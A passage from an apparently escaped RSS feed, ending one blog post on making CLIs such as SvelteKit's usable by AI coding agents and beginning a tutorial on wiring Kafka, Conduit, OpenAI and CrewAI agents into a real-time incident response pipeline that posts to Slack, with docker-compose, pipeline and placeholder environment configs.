&lt;p&gt;As of the time of writing, you can initialize a SvelteKit application in one go, unless you want to add some specifications such as the ones I mentioned on my prompt, in particular TailwindCSS.&lt;/p&gt;
&lt;p&gt;In order to do that, you’d need to combine both, &lt;code class=&quot;language-text&quot;&gt;sv create&lt;/code&gt; with &lt;code class=&quot;language-text&quot;&gt;sv add&lt;/code&gt;. The right commands would have been:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;code class=&quot;language-text&quot;&gt;sv create doodle-app --template minimal --types ts&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code class=&quot;language-text&quot;&gt;sv add tailwindcss&lt;/code&gt;&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;The problem is that even the first command presents a prompt!:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;bash&quot;&gt;&lt;pre class=&quot;language-bash&quot;&gt;&lt;code class=&quot;language-bash&quot;&gt;sv create doodle-app &lt;span class=&quot;token parameter variable&quot;&gt;--template&lt;/span&gt; minimal &lt;span class=&quot;token parameter variable&quot;&gt;--types&lt;/span&gt; ts
┌  Welcome to the Svelte CLI&lt;span class=&quot;token operator&quot;&gt;!&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;v0.8.7&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
│
◆  Project created
│
◆  What would you like to &lt;span class=&quot;token function&quot;&gt;add&lt;/span&gt; to your project? &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;use arrow keys / space bar&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
│  ◻ prettier &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;formatter - https://prettier.io&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
│  ◻ eslint
│  ◻ vitest
│  ◻ playwright
│  ◻ tailwindcss
│  ◻ sveltekit-adapter
│  ◻ drizzle
│  ◻ lucia
│  ◻ mdsvex
│  ◻ paraglide
│  ◻ storybook&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;What if this could be done in a simpler way, including a flag to ensure there won’t be a prompt?&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;bash&quot;&gt;&lt;pre class=&quot;language-bash&quot;&gt;&lt;code class=&quot;language-bash&quot;&gt;sv create doodle-app &lt;span class=&quot;token parameter variable&quot;&gt;--type&lt;/span&gt; ts &lt;span class=&quot;token parameter variable&quot;&gt;--addon&lt;/span&gt; tailwindcss --no-input&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;This use case made me think about those users who would use an AI coding agent like this one without having any coding knowledge. Isn’t that what AI coding agents are for, after all?&lt;/p&gt;
&lt;p&gt;Would they be able to successfully initiate such a simple project like this if they needed to? Probably not.&lt;/p&gt;
&lt;h2&gt;Conclusion&lt;/h2&gt;
&lt;p&gt;This is not a critique of Jules or Svelte particularly. Svelte is a great front-end framework and the one that powers my personal site &lt;a href=&quot;https://raulb.dev&quot;&gt;https://raulb.dev&lt;/a&gt;. What I wanted to illustrate with this post is that you need to start thinking about a different paradigms when designing and building your CLIs.&lt;/p&gt;
&lt;p&gt;Over time, AI coding agents will become more sophisticated, and they will manage to overcome flaws like the one I highlighted here. However, you need to reconsider the current status of your CLI. If you want your product to stay relevant in the new AI ecosystem we all live in now, it needs to be documented, installed, and able to be used in a way that any coding agent could fully operate with it. Now, or it’ll be too late.&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Stream, Think, Act: Building Autonomous Incident Response Agents with Kafka, Conduit, and CrewAI]]></title><description><![CDATA[Build a real-time incident response system using Kafka, Conduit, and CrewAI. Stream alerts, trigger AI agents, and post to Slack—all autonomously.]]></description><link>https://meroxa.com/blog/stream-think-act-building-autonomous-incident-response-agents-with-kafka-conduit-and-crewai</link><guid isPermaLink="false">https://meroxa.com/blog/stream-think-act-building-autonomous-incident-response-agents-with-kafka-conduit-and-crewai</guid><dc:creator><![CDATA[DeVaris Brown]]></dc:creator><pubDate>Wed, 28 May 2025 04:47:00 GMT</pubDate><content:encoded>&lt;p&gt;LLMs made it easy to generate answers. But the real opportunity lies in building systems that can &lt;strong&gt;act,&lt;/strong&gt; not just respond.&lt;/p&gt;
&lt;p&gt;That’s where &lt;strong&gt;agents&lt;/strong&gt; come in.&lt;/p&gt;
&lt;p&gt;Frameworks like &lt;a href=&quot;https://crewai.com/&quot;&gt;CrewAI&lt;/a&gt; let you design teams of language models that take on real tasks. But in most setups today, agents only run when you tell them to. They’re passive. They wait.&lt;/p&gt;
&lt;p&gt;If we want AI systems that feel more like software teammates — ones that respond to the world around them — we need to wire them into &lt;strong&gt;live data&lt;/strong&gt;.&lt;/p&gt;
&lt;hr&gt;
&lt;h3&gt;🧠 Why Agents Need Real-Time Data&lt;/h3&gt;
&lt;p&gt;All agent workflows:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Rely on manual triggers&lt;/li&gt;
&lt;li&gt;Operate in batch&lt;/li&gt;
&lt;li&gt;Miss the moment something important happens&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Now imagine an agent that:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Receives incoming signals instantly&lt;/li&gt;
&lt;li&gt;Processes and classifies them on the fly&lt;/li&gt;
&lt;li&gt;Takes action — or escalates — without needing you to hit “run”&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;That’s what it looks like when agents are actually part of your system — not just a tool you query. This should be the default for any agentic application with real-time stakes.&lt;/p&gt;
&lt;hr&gt;
&lt;h3&gt;🔌 Conduit: The Data Layer for Autonomous Agents&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;&lt;a href=&quot;https://conduit.io/&quot;&gt;Conduit&lt;/a&gt;&lt;/strong&gt; is a developer-focused data streaming &amp;#x26; processing tool for routing data across your stack. It connects over 100 sources like &lt;strong&gt;HTTP, Kafka, S3, Postgres&lt;/strong&gt;, Salesforce, and Zendesk, transforms the data with built-in processors (including LLMs), and pushes it to wherever your agents live.&lt;/p&gt;
&lt;p&gt;Think of it as the glue between your real-world signals and your AI workflows.&lt;/p&gt;
&lt;p&gt;With Conduit, agents can operate on:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Live alerts&lt;/li&gt;
&lt;li&gt;User actions&lt;/li&gt;
&lt;li&gt;System logs&lt;/li&gt;
&lt;li&gt;Support tickets&lt;/li&gt;
&lt;li&gt;Anything else that happens in your stack&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;You don’t need to reinvent stream processing — just plug it in.&lt;/p&gt;
&lt;hr&gt;
&lt;h3&gt;🤝 CrewAI + Conduit: A Simple, Powerful Stack&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;&lt;a href=&quot;https://crewai.com/&quot;&gt;CrewAI&lt;/a&gt;&lt;/strong&gt; lets you define a set of agents with clear roles and tasks. It&apos;s easy to use, flexible, and built for developers who want more than just a chatbot.&lt;/p&gt;
&lt;p&gt;When you pair CrewAI with Conduit:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Your agents get structured, enriched input the moment it matters&lt;/li&gt;
&lt;li&gt;You avoid polling, delays, and brittle pipelines&lt;/li&gt;
&lt;li&gt;You get closer to building systems that act with autonomy — not just automation&lt;/li&gt;
&lt;/ul&gt;
&lt;hr&gt;
&lt;h3&gt;🛠 What We’ll Build: Real-Time Incident Response Agent&lt;/h3&gt;
&lt;p&gt;Incidents happen. But the standard response is still too manual:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;An alert fires&lt;/li&gt;
&lt;li&gt;An engineer sees it (maybe)&lt;/li&gt;
&lt;li&gt;Someone summarizes it&lt;/li&gt;
&lt;li&gt;Someone else posts a Slack update&lt;/li&gt;
&lt;li&gt;Hopefully, someone opens the right runbook&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;In this walkthrough, we’ll create a &lt;strong&gt;Real-Time Incident Commander&lt;/strong&gt;:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;Alerts come in through an HTTP endpoint&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Conduit consumes alerts from Kafka and uses OpenAI to:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Summarize the incident&lt;/li&gt;
&lt;li&gt;Classify urgency&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Messages are streamed to Kafka&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;A CrewAI team kicks in:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code class=&quot;language-text&quot;&gt;TriageBot&lt;/code&gt; classifies severity&lt;/li&gt;
&lt;li&gt;&lt;code class=&quot;language-text&quot;&gt;CommsBot&lt;/code&gt; writes a Slack update&lt;/li&gt;
&lt;li&gt;&lt;code class=&quot;language-text&quot;&gt;RunbookBot&lt;/code&gt; suggests what to do next&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Slack gets updated in real time&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;This is how you move from prompt-based AI to AI systems that are always on and always aware.&lt;/p&gt;
&lt;p&gt;Let’s build it. 👇&lt;/p&gt;
&lt;hr&gt;
&lt;h3&gt;🔧 System Architecture&lt;/h3&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 800px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/static/eb62365c8a99ec955aad43323462bc5a/772aa/mermaid-diagram-2025-05-28-044324.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 69%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAOCAYAAAAvxDzwAAAACXBIWXMAAAsTAAALEwEAmpwYAAAB20lEQVR42pWTa1PaUBCGU1Er7YztKFhQLiEYbglpgEZC7iGEJGCY/v8/87pnZ/xg1Sofds7MuTxn9913pZOLX/g3KtUGpNMa2j0N0TpBKCJOEEQJLq9lSOd1vPVOhPQusHINWTWQFTlWjgPHdZFmOX7WewysVI8A8gEBu30NQRhgRTB7tYLr+wRUOPujMjz91uC4rMno9HX0hzMoQ5MlqP5o8Zmo4kPgs3aDyRwbKs8L15hbNnxa3SCCtXRIzw3iJMXN3QDSWf0VWHpLO920cPh7QL7bIYwi+IEP1/OwThLsHvfYl3s0OyP+/FNAzfiD8lBis93CIZAfBAwUa1YUKPY7NNpDyvBIYErA5cpGFMcMFHE88OQKI32Bx7JEkqYYjcfUYQfmbIbpb4OBWbEjDVX+/L9AEWffb1FrqmgrOut02x2jez+lbhu4kye816JuCz+e0913uyyMKrpmLmyEodDMp8kIaUJiJJsNtnnGGQuDCy3jdUR3l69M/iJD6esNa9NTdTZ1T52iN5hShho6ygTKwOB9+V7jO026+4XefKhhR9FguyEWDx6M2ZJWF1PzgTS0YNk+B08Ma/gJY4/0ObI8pxK3VF5Is+zy+Hl+QFai0qn7jdazsV8CnwDkyXiet95hQwAAAABJRU5ErkJggg==&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;System Architecture for Crew + Conduit&quot;
        title=&quot;&quot;
        src=&quot;/static/eb62365c8a99ec955aad43323462bc5a/5a190/mermaid-diagram-2025-05-28-044324.png&quot;
        srcset=&quot;/static/eb62365c8a99ec955aad43323462bc5a/772e8/mermaid-diagram-2025-05-28-044324.png 200w,
/static/eb62365c8a99ec955aad43323462bc5a/e17e5/mermaid-diagram-2025-05-28-044324.png 400w,
/static/eb62365c8a99ec955aad43323462bc5a/5a190/mermaid-diagram-2025-05-28-044324.png 800w,
/static/eb62365c8a99ec955aad43323462bc5a/c1b63/mermaid-diagram-2025-05-28-044324.png 1200w,
/static/eb62365c8a99ec955aad43323462bc5a/29007/mermaid-diagram-2025-05-28-044324.png 1600w,
/static/eb62365c8a99ec955aad43323462bc5a/772aa/mermaid-diagram-2025-05-28-044324.png 2042w&quot;
        sizes=&quot;(max-width: 800px) 100vw, 800px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;hr&gt;
&lt;h3&gt;🧰 Prerequisites&lt;/h3&gt;
&lt;p&gt;To follow along, you’ll need:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Python 3.8+&lt;/strong&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Docker + Docker Compose&lt;/strong&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Kafka (via Bitnami image)&lt;/strong&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;OpenAI API Key&lt;/strong&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Slack Bot Token&lt;/strong&gt; and &lt;strong&gt;Channel ID&lt;/strong&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;📁 Folder Structure&lt;/h3&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;jsx&quot;&gt;&lt;pre class=&quot;language-jsx&quot;&gt;&lt;code class=&quot;language-jsx&quot;&gt;project&lt;span class=&quot;token operator&quot;&gt;-&lt;/span&gt;root&lt;span class=&quot;token operator&quot;&gt;/&lt;/span&gt;
├── docker&lt;span class=&quot;token operator&quot;&gt;-&lt;/span&gt;compose&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;yml
├── &lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;env
├── pipeline&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;yaml
├── alert_api&lt;span class=&quot;token operator&quot;&gt;/&lt;/span&gt;
│   ├── app&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;py
│   └── Dockerfile
├── crewai_runner&lt;span class=&quot;token operator&quot;&gt;/&lt;/span&gt;
│   ├── agent_runner&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;py
│   └── Dockerfile&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;hr&gt;
&lt;h3&gt;📄 &lt;code class=&quot;language-text&quot;&gt;.env&lt;/code&gt; (Secrets &amp;#x26; Config)&lt;/h3&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;bash&quot;&gt;&lt;pre class=&quot;language-bash&quot;&gt;&lt;code class=&quot;language-bash&quot;&gt;&lt;span class=&quot;token assign-left variable&quot;&gt;OPENAI_API_KEY&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt;sk-&lt;span class=&quot;token punctuation&quot;&gt;..&lt;/span&gt;.
&lt;span class=&quot;token assign-left variable&quot;&gt;SLACK_BOT_TOKEN&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt;xoxb-&lt;span class=&quot;token punctuation&quot;&gt;..&lt;/span&gt;.
&lt;span class=&quot;token assign-left variable&quot;&gt;SLACK_CHANNEL_ID&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt;C01&lt;span class=&quot;token punctuation&quot;&gt;..&lt;/span&gt;.
&lt;span class=&quot;token assign-left variable&quot;&gt;KAFKA_BOOTSTRAP_SERVER&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt;kafka:9092&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;hr&gt;
&lt;h3&gt;📦 &lt;code class=&quot;language-text&quot;&gt;docker-compose.yml&lt;/code&gt; (KRaft Kafka + Conduit + Flask + Crew)&lt;/h3&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;yaml&quot;&gt;&lt;pre class=&quot;language-yaml&quot;&gt;&lt;code class=&quot;language-yaml&quot;&gt;&lt;span class=&quot;token key atrule&quot;&gt;version&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&apos;3.8&apos;&lt;/span&gt;

&lt;span class=&quot;token key atrule&quot;&gt;services&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
  &lt;span class=&quot;token key atrule&quot;&gt;kafka&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
    &lt;span class=&quot;token key atrule&quot;&gt;image&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; bitnami/kafka&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;latest
    &lt;span class=&quot;token key atrule&quot;&gt;ports&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
      &lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;9092:9092&quot;&lt;/span&gt;
    &lt;span class=&quot;token key atrule&quot;&gt;environment&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
      &lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt; KAFKA_CFG_NODE_ID=0
      &lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt; KAFKA_CFG_PROCESS_ROLES=broker&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;controller
      &lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt; KAFKA_CFG_CONTROLLER_QUORUM_VOTERS=0@kafka&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;token number&quot;&gt;9093&lt;/span&gt;
      &lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt; KAFKA_CFG_LISTENERS=PLAINTEXT&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;//&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;token number&quot;&gt;9092&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;CONTROLLER&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;//&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;token number&quot;&gt;9093&lt;/span&gt;
      &lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt; KAFKA_CFG_ADVERTISED_LISTENERS=PLAINTEXT&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;//kafka&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;token number&quot;&gt;9092&lt;/span&gt;
      &lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt; KAFKA_CFG_LISTENER_SECURITY_PROTOCOL_MAP=CONTROLLER&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;PLAINTEXT&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;PLAINTEXT&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;PLAINTEXT
      &lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt; KAFKA_CFG_CONTROLLER_LISTENER_NAMES=CONTROLLER
      &lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt; ALLOW_PLAINTEXT_LISTENER=yes

  &lt;span class=&quot;token key atrule&quot;&gt;conduit&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
    &lt;span class=&quot;token key atrule&quot;&gt;image&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; ghcr.io/conduitio/conduit&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;latest
    &lt;span class=&quot;token key atrule&quot;&gt;ports&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
      &lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;8080:8080&quot;&lt;/span&gt;
    &lt;span class=&quot;token key atrule&quot;&gt;volumes&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
      &lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt; ./pipeline.yaml&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;/etc/conduit/pipeline.yaml
    &lt;span class=&quot;token key atrule&quot;&gt;command&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;./conduit&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;run&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;/etc/conduit/pipeline.yaml&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;
    &lt;span class=&quot;token key atrule&quot;&gt;depends_on&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
      &lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt; kafka
    &lt;span class=&quot;token key atrule&quot;&gt;env_file&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
      &lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt; .env

  &lt;span class=&quot;token key atrule&quot;&gt;flask-alert-api&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
    &lt;span class=&quot;token key atrule&quot;&gt;build&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
      &lt;span class=&quot;token key atrule&quot;&gt;context&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; ./alert_api
    &lt;span class=&quot;token key atrule&quot;&gt;ports&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
      &lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;5000:5000&quot;&lt;/span&gt;
    &lt;span class=&quot;token key atrule&quot;&gt;env_file&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
      &lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt; .env
    &lt;span class=&quot;token key atrule&quot;&gt;depends_on&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
      &lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt; kafka

  &lt;span class=&quot;token key atrule&quot;&gt;crewai-runner&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
    &lt;span class=&quot;token key atrule&quot;&gt;build&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
      &lt;span class=&quot;token key atrule&quot;&gt;context&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; ./crewai_runner
    &lt;span class=&quot;token key atrule&quot;&gt;env_file&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
      &lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt; .env
    &lt;span class=&quot;token key atrule&quot;&gt;depends_on&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
      &lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt; kafka&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;hr&gt;
&lt;h3&gt;🧠 &lt;code class=&quot;language-text&quot;&gt;pipeline.yaml&lt;/code&gt; (Conduit: Kafka → OpenAI → Kafka)&lt;/h3&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;yaml&quot;&gt;&lt;pre class=&quot;language-yaml&quot;&gt;&lt;code class=&quot;language-yaml&quot;&gt;&lt;span class=&quot;token key atrule&quot;&gt;version&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;2.2&lt;/span&gt;

&lt;span class=&quot;token key atrule&quot;&gt;pipelines&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
  &lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt; &lt;span class=&quot;token key atrule&quot;&gt;id&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; incident&lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt;pipeline
    &lt;span class=&quot;token key atrule&quot;&gt;status&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; running
    &lt;span class=&quot;token key atrule&quot;&gt;connectors&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
      &lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt; &lt;span class=&quot;token key atrule&quot;&gt;id&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; kafka&lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt;source
        &lt;span class=&quot;token key atrule&quot;&gt;type&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; source
        &lt;span class=&quot;token key atrule&quot;&gt;plugin&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; builtin&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;kafka
        &lt;span class=&quot;token key atrule&quot;&gt;settings&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
          &lt;span class=&quot;token key atrule&quot;&gt;servers&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; $&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;KAFKA_BOOTSTRAP_SERVER&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;
          &lt;span class=&quot;token key atrule&quot;&gt;topics&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; raw_alerts

      &lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt; &lt;span class=&quot;token key atrule&quot;&gt;id&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; summarize
        &lt;span class=&quot;token key atrule&quot;&gt;type&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; processor
        &lt;span class=&quot;token key atrule&quot;&gt;plugin&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; openai.textgen
        &lt;span class=&quot;token key atrule&quot;&gt;settings&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
          &lt;span class=&quot;token key atrule&quot;&gt;api_key&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; $&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;OPENAI_API_KEY&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;
          &lt;span class=&quot;token key atrule&quot;&gt;developer_message&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;&gt;&lt;/span&gt;&lt;span class=&quot;token scalar string&quot;&gt;
            Summarize this alert and classify its urgency (low, medium, high).
            Format as JSON: {&quot;summary&quot;: &quot;...&quot;, &quot;urgency&quot;: &quot;...&quot;}&lt;/span&gt;
          &lt;span class=&quot;token key atrule&quot;&gt;field&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; .Payload

      &lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt; &lt;span class=&quot;token key atrule&quot;&gt;id&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; kafka&lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt;out
        &lt;span class=&quot;token key atrule&quot;&gt;type&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; destination
        &lt;span class=&quot;token key atrule&quot;&gt;plugin&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; builtin&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;kafka
        &lt;span class=&quot;token key atrule&quot;&gt;settings&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
          &lt;span class=&quot;token key atrule&quot;&gt;servers&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; $&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;KAFKA_BOOTSTRAP_SERVER&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;
          &lt;span class=&quot;token key atrule&quot;&gt;topics&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; enriched_alerts&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;hr&gt;
